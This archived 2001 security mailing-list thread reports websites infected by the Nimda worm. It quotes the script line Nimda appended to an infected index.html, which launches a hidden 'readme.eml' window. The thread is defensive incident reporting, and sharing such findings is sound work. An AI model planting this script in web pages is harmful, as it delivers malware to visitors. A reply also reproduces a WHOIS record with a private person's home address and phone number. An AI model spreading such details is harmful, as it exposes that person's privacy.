Security Incidents mailing list archives
RE: Web site infected by Nimda
From: "Ken Pfeil" <Ken () infosec101 org>
Date: Wed, 19 Sep 2001 13:44:31 -0400
I'm sure there's thousands of sites affected. No need to list em all here. As an FYI, wininternals.com is NOT related to Winternals Software. It is registered to: Registrant: Konstantinos Iatropoulos 3400 Ovila Hamel St. Hubert, Quebec j3y 8p4 ca Domain Name: WININTERNALS.COM Administrative Contact: Iatropoulos, Konstantinos costa.sylvia.iatropoulos () sympatico ca 3400 Ovila Hamel St. Hubert, Quebec j3y 8p4 ca 450 4624930 Technical Contact: Nameback, Hostmaster dns () nameback com 1001 N. Lake Destiny Road Suite 125 Maitland, FL 32751 US (407) 475-1130 Billing Contact: Billing, Nameback billing () nameback com 1001 N. Lake Destiny Rd. Suite 125 Maitland, Florida 32751 US 407-475-1130 Record last updated on 18-Sep-2001. Record expires on 14-Jun-2002. Record Created on 14-Jun-2000. Domain servers in listed order: NS1.INFOBACK.NET 207.30.43.2 NS2.INFOBACK.COM 207.30.43.3
-----Original Message----- From: Jac Engel [mailto:jacengel () home nl] Sent: Wednesday, September 19, 2001 1:07 PM To: acz [iSecureLabs]; incidents () securityfocus com Subject: RE: Web site infected by Nimda http://www.wininternals.com is also infected by Nimda Virus, after the page is loaded I get a new page saying : You have encountered the following error while using Windows Media Player: ------------------------------------------------------------------ ---------- ---- Error# 8007000D Sorry, no more help is available for this problem at this time. Jac -----Original Message----- From: acz [iSecureLabs] [mailto:aurelien.cabezon () iSecureLabs com] Sent: Sunday, September 19, 1999 5:46 PM To: incidents () securityfocus com Subject: Web site infected by Nimda Hi all, http://www.digimind.fr/ is infected by Nimda virus ! This line was added at the end of the index.html ---<cut>--- <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> ---<cut>--- If you wanna visit digimind.fr, turn your webbrowser javascript off ! --- Cabezon Aurelien http://www.iSecureLabs.com ------------------------------------------------------------------ ---------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ------------------------------------------------------------------ ---------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Nimda - collected information Berislav Kucan (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- RE: Web site infected by Nimda Ken Pfeil (Sep 19)
- RE: Web site infected by Nimda John Q. Public (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Nick FitzGerald (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 20)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)